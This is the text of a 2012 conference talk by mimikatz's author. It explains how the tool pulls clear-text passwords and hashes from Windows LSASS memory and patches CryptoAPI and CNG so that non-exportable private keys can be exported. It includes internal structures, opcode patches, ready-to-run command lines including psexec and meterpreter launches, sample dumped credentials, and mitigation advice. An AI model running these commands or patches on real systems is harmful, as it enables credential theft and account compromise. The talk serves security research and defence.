mimikatz @ asfws

mimikatz

Benjamin DELPY `gentilkiwi`
focus on sekurlsa/pass-the-pass
and crypto patches

Who ? Why ?
Benjamin DELPY `gentilkiwi`
– French
– 26y
– Kiwi addict
– Lazy programmer

Started to code mimikatz to :
– explain security concepts ;
– improve my knowledge ;
– prove to Microsoft that sometimes they must change old habits.

Why all in French ?
– because I’m 
– It limits script kiddies usage
– Hack with class
07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com 2

mimikatz
working
On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8
– x86 & x64
– 2000 support dropped with mimikatz 1.0

Everywhere ; it’s statically compiled

Two modes
– direct action (local commands) – process or driver communication

m KeyIso m SamSS
« Isolation de clé CNG » « Gestionnaire de comptes de sécurité »
i LSASS.EXE i LSASS.EXE
m
i
m
i
 VirtualAllocEx, Write
Direct action :
k crypto::patchcng k ProcessMemory, Create
a a
t t  RemoteThread...

EventLog sekurlsa.dll
z z
« Journal d’événements Windows »
. SVCHOST.EXE
.
Open a pipe
e e
x x Write a welcome message
Direct action :
e e Wait commands… and return results
divers::eventdrop


mimikatz
architecture of sekurlsa & crypto

mod_mimikatz_standard mod_parseur

mod_mimikatz_winmine mod_text

mod_mimikatz_divers mod_memory
mod_cryptoapi

m mod_mimikatz_nogpo mod_secacl
mimikatz.sys

i
m mod_mimikatz_impersonate
mod_mimikatz_crypto mod_crypto

i mod_mimikatz_inject mod_pipe kappfree.dll

k mod_mimikatz_samdump mod_cryptoacng
mod_inject

a mod_mimikatz_handle mod_hive kelloworld.dll
t
mod_mimikatz_privilege mod_patch sam
z msv_1_0

. mod_mimikatz_system mod_privilege
tspkg
klock.dll
secrets

e mod_mimikatz_service mod_system msv_1_0

x mod_mimikatz_sekurlsa
wdigest
mod_service tspkg
sekurlsa.dll
e mod_mimikatz_process
livessp
mod_process wdigest
kerberos
mod_mimikatz_thread mod_thread livessp

mod_mimikatz_terminalserver mod_ts kerberos


mimikatz :: sekurlsa mod_mimikatz_sekurlsa

what is it ?
A module replacement for my previous favorite library !

A local module that can read data from the SamSS Service (well
known LSASS process)

What sekurlsa module can dump :
– MSV1_0 hashes
– TsPkg passwords
– Wdigest passwords
– LiveSSP passwords
– Kerberos passwords (!)
– …?


mimikatz :: sekurlsa
how LSA works ( PLAYSKOOL level)

Authentication
WinLogon LsaSS msv1_0 SAM

user:domain:password kerberos

Authentication
Packages
msv1_0
Challenge
Response tspkg
wdigest
livessp
kerberos


how LSA works ( PLAYSKOOL level)
Authentication packages :
– take user’s credentials from the logon
– make their own stuff
– keep enough data in memory to compute responses of
challenges (Single Sign On)

If we can get data, and inject it in another session of
LSASS, we avoid authentication part

This is the principle of « Pass-the-hash »
– In fact, of « Pass-the-x »


history of « pass-the-* » 1/2
Pass-the-hash
– 1997 - Unix modified SAMBA client for Hashes usage ; Paul Ashton (EIGEN)
– 2000 - Private version of a Windows « LSA Logon Session Editor » ; Hernan
Ochoa (CoreSecurity)
– 2007 - TechEd @ Microsoft ; Marc Murray (TrueSec) present msvctl, and
provide some downloads of it 
– 2007 - « Pass the hash toolkit » published ; Hernan Ochoa (CoreSecurity)
– 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86
& x64 versions of Windows (yeah, by myself but in French; so not famous ;))

2007 was the year of pass the hash !

Pass-the-ticket
– 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support; Hernan Ochoa (Ampliasecurity)


history of « pass-the-* » 2/2
Pass-the-pass
– 05/2011 – mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3)
• http://blog.gentilkiwi.com/securite/pass-the-pass
– 05/2011 – return of mimikatz ; it dumps clear text passwords from WDigest provider (unlimited
this time ;))
• http://blog.gentilkiwi.com/securite/re-pass-the-pass
– 05/2011 – Some organizations opened cases to Microsoft about it…

…Lots of time…

– begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say few words about mimikatz
– 03/2012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password
extract…
• http://seclists.org/pen-test/2012/Mar/7
– 03/2012 – mimikatz strikes again with LiveSSP provider and extracts Live login passwords from
Windows 8 memory
• http://blog.gentilkiwi.com/securite/rere-pass-the-pass
– 03/2012 – yeah, once again…, more curious but Kerberos keeps passwords in memory
• http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
– 08/2012 – sekurlsa module without injection at all ! (ultra safe)
• http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition


mimikatz :: sekurlsa :: tspkg

because sometimes hash is not enough…

what is it ?
Microsoft introduces SSO capability for Terminal Server with
NT 6 to improve RemoteApps and RemoteDestkop users’s
experience
– http://technet.microsoft.com/library/cc772108.aspx

Rely on CredSSP with Credentials Delegation (!= Account
delegation)
– Specs : http://download.microsoft.com/download/9/5/e/95ef66af-
9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf

First impression : it seems cool 
– User does not have to type its password
– Password is not in RDP file
– Password is not in user secrets

questions ?
KB says that for it works, we must enable « Default credentials » delegation
– “Default credentials : The credentials obtained when the user first logs on to
Windows” - https://msdn.microsoft.com/library/bb204773.aspx
• What ? Our User/Domain/,Password | Hash | Ticket- ? It seems …
– In all cases, system seems to be vulnerable to pass-the-*…

In what form ?
Our specs : [MS-CSSP]
– 2.2.1.2.1 TSPasswordCreds
• The TSPasswordCreds structure contains the user's password credentials that are delegated
to the server. (or PIN)
TSPasswordCreds ::= SEQUENCE {
domainName [0] OCTET STRING,
userName [1] OCTET STRING,
password [2] OCTET STRING
}
– Challenge / response for authentication ?
• Serveur : YES (TLS / Kerberos)
• Client : NO ; *password* is sent to server…

So password resides somewhere in memory ?


symbols & theory
Let’s explore some symbols !
kd> x tspkg!*clear*
75016d1c tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68 tspkg!TSDuplicatePassword = <no type information>
75011cd4 tspkg!TSHidePassword = <no type information>
750195ee tspkg!TSRevealPassword = <no type information>
75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>

– sounds cool… (thanks Microsoft)

Let’s imagine a scenario
– Enumerate all sessions to obtain :
• Username
• Domain
• LUID
– Call tspkg!TSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with
LUID to obtain :
• TS_CREDENTIAL
– Call tspkg!TSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data
(TS_PRIMARY_CREDENTIAL) for :
• TS_PRIMARY_CREDENTIAL with clear text credentials…


workflow

LsaEnumerateLogonSessions typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
BYTE unk0[108];
#elif defined _M_IX86
BYTE unk0[64];
for each LUID #endif
LUID LocallyUniqueIdentifier;
PVOID unk1;
PVOID unk2;
tspkg!TSGlobal KIWI_TS_CREDEN PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
TIAL } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
CredTable

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
PVOID unk0;
LSA_UNICODE_STRING Domaine;
RtlLookupElementGenericTabl LSA_UNICODE_STRING UserName;
eAvl LSA_UNICODE_STRING Password;
}
KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CRED
KIWI_TS_CREDEN ENTIAL;
TIAL
KIWI_TS_PRIMAR
Y_CREDENTIAL

LsaUnprotectMemory

password
in clear !


demo time !

sekurlsa::tspkg

mimikatz :: sekurlsa :: wdigest

because clear text password over http/https is not cool

what is it ?
“Digest access authentication is one of the agreed-upon methods a
web server can use to negotiate credentials with a user's web
browser. It applies a hash function to a password before sending it
over the network *…+”
Wikipedia : http://en.wikipedia.org/wiki/Digest_access_authentication

“Common Digest Authentication Scenarios :
– Authenticated client access to a Web site
– Authenticated client access using SASL
– Authenticated client access with integrity protection to a directory service
using LDAP”
Microsoft : http://technet.microsoft.com/library/cc778868.aspx

Again, it seems cool 
– No password over the network, just hashes
– No reversible password in Active Directory ; hashes for each realm
• Only with Advanced Digest authentication


what is it ?
We speak about hashes, but what hashes ?
H = MD5(HA1:nonce:[…]:HA2)
• HA1 = MD5(username:realm:password)
• HA2 = MD5(method:digestURI:[…])

Even after login, HA1 may change… realm is from server side
and cannot be determined before Windows logon

WDigest provider must have elements to compute responses
for different servers :
– Username
– Realm (from server)
– Password


theory
This time, we know :
– that WDigest keeps password in memory « by protocol » for HA1 digest
– that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)

LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let’s perform a research in WDigest :
.text:7409D151 _DigestCalcHA1@8 call dword ptr [eax+0B4h]

– Hypothesis seems verified 
LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let’s perform a research in WDigest :
.text:74096C69 _SpAcceptCredentials@16 call dword ptr [eax+0B0h]

– SpAcceptCredentials takes clear password in args
• Protect it with LsaProtectMemory
• Update or insert data in double linked list : wdigest!l_LogSessList


workflow
typedef struct _KIWI_WDIGEST_LIST_ENTRY {
LsaEnumerateLogonSessions
struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
DWORD UsageCount;
struct _KIWI_WDIGEST_LIST_ENTRY *This;
for each LUID LUID LocallyUniqueIdentifier;
[…]
LSA_UNICODE_STRING UserName;
wdigest!l_LogS LSA_UNICODE_STRING Password;
[…]
essList }
KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY
;
search linked list for LUID

KIWI_WDIGEST_L
IST_ENTRY

LsaUnprotectMemory

password
in clear !


demo time !

sekurlsa::wdigest

mimikatz :: sekurlsa :: livessp

because Microsoft was too good in closed networks

how
Actually I’ve only used logical (empirical) approach to
search passwords… :
– Protocol reading
– Symbols searching

~ Boring ~… be more brutal this time : make a WinDBG trap !
0: kd> !process 0 0 lsass.exe
PROCESS 83569040 SessionId: 0 Cid: 0224 Peb: 7f43f000 ParentCid: 01b4
DirBase: 5df58100 ObjectTable: 80ce4740 HandleCount: <Data Not Accessible>
Image: lsass.exe

0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc int 3
0: kd> .reload /user
Loading User Symbols
............................................................
0: kd> bp /p @$proc lsasrv!LsaProtectMemory "kc 5 ; g"
0: kd> g


how
Let’s login with a Live account on Windows 8 !
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials Our LiveSSP provider
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

msv1_0!NlpAddPrimaryCredential Yeah, Pass the Hash capability with Live
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials account too…
tspkg!TSHidePassword Live user can logon through RDP via SSO
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
[...]
livessp!LsaApLogonUserEx2+0x560 (74781a96):
call to livessp!LiveCreateLogonSession (74784867)

After credentials protection, LsaApLogonUserEx2 calls
LiveCreateLogonSession to insert data in
LiveGlobalLogonSessionList (similar to WDigest)

workflow
typedef struct _KIWI_LIVESSP_LIST_ENTRY {
LsaEnumerateLogonSessions struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
PVOID unk0;
PVOID unk1;
PVOID unk2;
for each LUID PVOID unk3;
DWORD unk4;
DWORD unk5;
PVOID unk6;
livessp!LiveGloba LUID LocallyUniqueIdentifier;
lLogonSessionList LSA_UNICODE_STRING UserName;
PVOID unk7;
PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY,
search linked list for LUID *PKIWI_LIVESSP_LIST_ENTRY;

KIWI_LIVESSP_LIS
T_ENTRY typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
KIWI_LIVESSP_PRI DWORD isSupp;
MARY_CREDENTIAL DWORD unk0;
LSA_UNICODE_STRING Password;
LsaUnprotectMemory }
KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PR
IMARY_CREDENTIAL;
password
in clear !



Even if we already have tools for normal accounts, are you
not curious to test one with this trap ?*

* Me, yes

mimikatz :: sekurlsa :: kerberos
Let’s login normal account
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
Kerberos, ticket part ? Maybe ;)
kerberos!SpAcceptCredentials

kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
Kerberos part for password ??????
kerberos!SpAcceptCredentials

msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

wdigest!SpAcceptCredentials

tspkg!TSHidePassword
tspkg!SpAcceptCredentials

After credentials protection, KerbCreateLogonSession calls :
– NT6 ; KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
– NT5 ; KerbInsertLogonSession to insert data in
KerbLogonSessionList

mimikatz :: sekurlsa :: kerberos (nt6)
workflow

LsaEnumerateLogonSessions

for each LUID typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
{
DWORD unk0;
PVOID unk1;
Kerberos!KerbG PVOID unk2;
KIWI_KERBEROS_PR
lobalLogonSess PVOID unk3;
IMARY_CREDENTIAL
ionTable #ifdef _M_X64
BYTE unk4[32];
BYTE unk4[20];
RtlLookupElementGenericTabl #endif
eAvl
#ifdef _M_X64
BYTE unk5[44];
BYTE unk5[36];
#endif
KIWI_KERBEROS_PR
IMARY_CREDENTIAL LSA_UNICODE_STRING Domaine;
LSA_UNICODE_STRING Password;
}
LsaUnprotectMemory KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_
PRIMARY_CREDENTIAL;

password
in clear !


mimikatz :: sekurlsa :: kerberos (nt5)
workflow
typedef struct _KIWI_KERBEROS_LOGON_SESSION {
LsaEnumerateLogonSessions struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
DWORD UsageCount;
PVOID unk0;
PVOID unk1;
for each LUID PVOID unk2;
DWORD unk3;
DWORD unk4;
PVOID unk5;
kerberos!KerbLog PVOID unk6;
onSessionList PVOID unk7;
#ifdef _M_IX86
DWORD unk8;
search linked list for LUID #endif
DWORD unk9;
DWORD unk10;
PVOID unk11;
DWORD unk12;
DWORD unk13;
KIWI_LIVESSP_PRI PVOID unk14;
MARY_CREDENTIAL PVOID unk15;
PVOID unk16;
[…]
LsaUnprotectMemory LSA_UNICODE_STRING Password;
}
KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON
password _SESSION;

in clear !


demo time !

Final sekurlsa demo sekurlsa::logonPasswords full

mimikatz :: sekurlsa :: kerberos
“hu ?”
Ok It works…*
But why ?
* Not at all logon on NT5 (can need an unlock)

From my understanding of Microsoft explanations
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy too)

Microsoft’s implementation of Kerberos is full of logical…
– For password auth :
• password hash for shared secret, but keeping password in memory
– For full smartcard auth :
• No password on client
• No hash on client ?
– NTLM hash on client…
– KDC sent it back as a gift


All passwords in memory are encrypted, but in a reversible way to be used

We used LsaUnprotecMemory, in the LSASS context, to decrypt them

LsaUnprotectMemory

– This function rely on LsaEncryptMemory from lsasrv.dll

For that, we previously inject a DLL (sekurlsa.dll) in the LSASS process to take
benefits of its keys when we called it

Can it be fun to decrypt outside the process ?
– Yes, it is… no more injection, just reading memory of LSASS process…

mimikatz can use lsasrv.dll too and “imports” LSASS initialized keys 
– When we call LsaEncryptMemory in mimikatz, with all keys imported from LSASS, we have
the same comportments than when we are in LSASS !

LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory use :
– RC4
DWORD ; 256
g_cbRandomKey
l
l
s
s g_pRandomKey
@BYTE[g_cbRandomKey]
a
a
s
s
r
BYTE[g_cbRandomKey]
m
s i l
v
m s
copy…
– DESx i a
@BYTE[144] k s
g_pDESXKey
l a r
l v
s
s BYTE[144] t
a z
a
s
s
r
s
v g_Feedback BYTE[8]


LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory use :
InitializationVector BYTE[16]

– 3DES
l
l
s typedef struct _KIWI_BCRYPT_KEY_DATA {
s DWORD size;
a
a h3DesKey DWORD tag;
s m DWORD type;
s DWORD unk0;
r i DWORD unk1;
s l DWORD unk2;
v
m s DWORD unk3;
PVOID unk4;
copy… i a BYTE data; /* etc... */
– AES k s
} KIWI_BCRYPT_KEY_DATA,
*PKIWI_BCRYPT_KEY_DATA;

a r
l typedef struct _KIWI_BCRYPT_KEY {
l t v
s DWORD size;
s z
DWORD type;
a PVOID unk0;
a hAesKey PKIWI_BCRYPT_KEY_DATA cle;
s PVOID unk1;
s
r } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
s
v


memo
Security Packages
Package Symbols Type
tspkg tspkg!TSGlobalCredTable RTL_AVL_TABLE
wdigest wdigest!l_LogSessList LIST_ENTRY
livessp livessp!LiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberos!KerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberos!KerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrv!LogonSessionList LIST_ENTRY
lsasrv!LogonSessionListCount ULONG

Protection Keys
Key NT 5 Symbols Key NT 6 Symbols
RC4 lsasrv!g_cbRandomKey lsasrv!InitializationVector
lsasrv!g_pRandomKey
3DES lsasrv!h3DesKey
DESx lsasrv!g_pDESXKey
AES lsasrv!hAesKey
lsasrv!g_Feedback


memo
Some commands :
 mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
 psexec windows -s -c c:mimikatzWin32mimikatz.exe "sekurlsa::logonPasswords full" exit
 meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id : 0;234870
Package d'authentification : NTLM
Utilisateur principal : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
msv1_0 :
* Utilisateur : Gentil Kiwi
* Domaine : vm-w8-rp-x
* Hash LM : d0e9aee149655a6075e4540af1f22d3b
* Hash NTLM : cc36cf7a8514893efccd332446158b1a
kerberos :
* Mot de passe : waza1234/
wdigest :
tspkg :
livessp : n.t. (LUID KO)


what we can do ?
Basics
– No physical access to computer (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke ; so useless !!!)
– For privileged account, network login instead of interactive (when possible)
– Audit ; pass the hash keeps traces and can lock accounts
– No admin rights / system rights / debug privileges, even VIP
– Use separated network (or forest) for privileged tasks

More in depth
– Force strong authentication (SmartCard & Token) : $ / €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic :
• biometrics (it keeps password somewhere and push it to Windows)
• single sign on
– Stop shared secrets for authentication : push Public / Private stuff (like keys ;))
– Let opportunities to stop retro compatibility
– Disable faulty providers ?
• Is it supported by Microsoft ?
• Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0 ?


mimikatz :: crypto mod_mimikatz_crypto

what is it ?
A little module that I wrote to :
– play with Windows Cryptographic API / CNG and RSA keys
– automate export of certificates/keys
• Even those which are “not” exportable 

What crypto module can do :
– List
• Providers
• Stores
• Certificates
• Keys
– Export
• Certificates
– public in DER format
– with private keys in PFX format
• Private keys in PVK format
– it’s cool, OpenSSL can deal with it too 
– Patch
• CryptoAPI in mimikatz context
• CNG in LSASS context (again !)


mimikatz :: crypto
how it’s protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
• At least without the master keys and/or password of users

Computer/User can load their own keys because they have enough
secrets to do it (ex : session opened)
– Yes, a computer/server open a “session”

Export/Usage can be limited by :
– Password Constraint for most user
– Popup Unavailable for computer keys
– Export/Archive flag no present
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport


mimikatz :: crypto :: capi
how it works
“Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is
supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all
cryptographic operations and manage private keys CSPs can be implemented in software
as well as in hardware.”
– http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory , Internet Explorer, yourappshere…) load some
DLL to deal with different cryptographic stuff : CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …

Process deal with cryptographic keys by this API…


mimikatz :: crypto :: capi
how it’s exported ( PLAYSKOOL level)

Process
CryptoAPI and RSA CSP
Exportable yes
Load Private Key DPAPI Decode
?

no

Ask to export Key NTE_BAD_KEY_STATE Exported Key


mimikatz :: crypto :: patchcapi
because I own my process
When we want to export a certificate with its private key (or only the key), it goes in
rsaenh!CPExportKey
This function do all the work to prepare the export, and check if the key is exportable

Exportable
?

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet: CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de clé = {470ADFBA-8718-4014-B05E-B30776B75A03}
Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'My
- Benjamin Delpy
Container Clé : {470ADFBA-8718-4014-B05E-B30776B75A03}
Provider : Microsoft Enhanced Cryptographic Provider v1.0
Type : AT_KEYEXCHANGE
Exportabilité : NON
Taille clé : 2048
Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO
(0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK


because I own my process
So what ? A module in my own process return that I can’t do something ?
CryptoAPI is in my memory space, let’s patch it !

.text:0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive

.text:0AC0B7CB 90 nop
.text:0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare

.text:0AC1F749 90 nop
.text:0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare

I wrote “4” bytes in my memory space


demo time !

Import, export, import as not exportable…. export

limitations
Because :
– I’m lazy
– I’ve seen in majority of case RSA keys for real life use
• Elliptic Curve a little…

mimikatz crypto::patchcapi only deal with :
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider

…all based on rsaenh.dll


mimikatz :: crypto :: cng
how it works
“Cryptography API: Next Generation (CNG) is the long-term replacement for the
CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in
behavior.”
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
“To comply with common criteria (CC) requirements, the long-lived keys must be isolated
so that they are never present in the application process. CNG currently supports the
storage of asymmetric private keys by using the Microsoft software KSP that is included
with Windows Server 2008 and Windows Vista and installed by default.

This time, keys operations are not made in the “user” process context

Process use RPC to call “Key isolation service” (keyiso) functions

It seems more secure than CryptoAPI…
– It is, but it’s not perfect…


mimikatz :: crypto :: cng
how it’s exported ( PLAYSKOOL level)

NT6 System protected process ML_SYSTEM
SYSTEM_MANDATORY_LABEL_NO_WRITE_UP
SYSTEM_MANDATORY_LABEL_NO_READ_UP
KeyIso Service (LSASS Process)
CNG
Exportable
Load Private Key DPAPI Decode
? yes
no

RPC

Process

Ask to export Key NTE_NOT_SUPPORTED Exported Key


mimikatz :: crypto :: patchcng
because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead
to lsass(keyiso):ncrypt!SPCryptExportKey

This function do all the work to prepare the export, and check if the key is exportable

Exportable
?

mimikatz # crypto::exportKeys
[user] Clés CNG :
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
Exportabilité : NON
Taille clé : 2048
Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.


because sometimes I own LSASS
This time, checks and keys are in LSASS process…
And what ?

.text:6C815210 75 1C jnz short continue_key_export

.text:6C815210 EB 1C jmp short continue_key_export

I wrote “1” byte in LSASS memory space…


demo time !

Import, export, import as not exportable…. export again

limitations
Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM

mimikatz crypto::patchcng only deal with :
– Microsoft Software Key Storage Provider (maybe others algs than RSA)

Not a limitation of mimikatz, but MMC addin for certificates cannot
export CNG certificates… even those that are exportable (hu ?)
– certutil can…


bonus
After one admin patched LSASS, all users of current system benefit of extra
exports
– until reboot / KeyIso service restart

Some others programs that doesn’t check the export flag before asking export
can work too
– Yeah, like the old good one : certutil
C:UsersGentil KiwiDesktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:UsersGentil KiwiDesktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.


mimikatz :: crypto
memo
Some commands :
 mimikatz crypto::patchcapi crypto::exportCertificates exit
 psexec windows -s -c c:mimikatzWin32mimikatz.exe crypto::patchcapi crypto::patchcng
"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
 mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
 mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates
crypto::exportKeys exit

Password :
– PFX files are protected by this password : mimikatz

Keys
– When you import multiple time a certificate, exportable or not, Windows make duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny isn’t it ?
• So yes, mimikatz can export it


mimikatz :: crypto
what we can do ?
Exactly the same as for sekurlsa, it will prevent access to
accounts / computer !
– no admin, no admin, no admin…

Basics
– Use smartcards/token for users certificates
– Use Hardware Security Modules (HSM), even SoftHSM

More in depth
– See what Microsoft can do with TPM from Windows 8
• Virtual SmartCard seems promising
– Verify vendors implementation (Lenovo, Dell, …) of TPM CSP/KSP
• Their biometrics stuff was a little buggy ;)


mimikatz
what else can it do ?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process / thread / image / registry)
– List Objects hooks and procedures
– …
…

mimikatz
that’s all folks !
Thanks’ to / Merci à :
– my girlfriend for her support (her LSASS crashed few times)
– Application Security Forum to offer me this great opportunity
• Partners and Sponsors for sure !
– Microsoft to always consider it as normal/acceptable 
– Security friends/community for their ideas & challenges
• nagual, newsoft, mubix, …
– You, for your attention !

Questions ?
Don’t be shy ;)
especially if you have written the corresponding slide number

Blog, Source Code & Contact

blog http://blog.gentilkiwi.com
mimikatz http://blog.gentilkiwi.com/mimikatz
source https://code.google.com/p/mimikatz/
email benjamin@gentilkiwi.com

mimikatz @ asfws

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Viewers also liked

Viewers also liked (20)

Similar to mimikatz @ asfws

Similar to mimikatz @ asfws (17)

Recently uploaded

Recently uploaded (20)

mimikatz @ asfws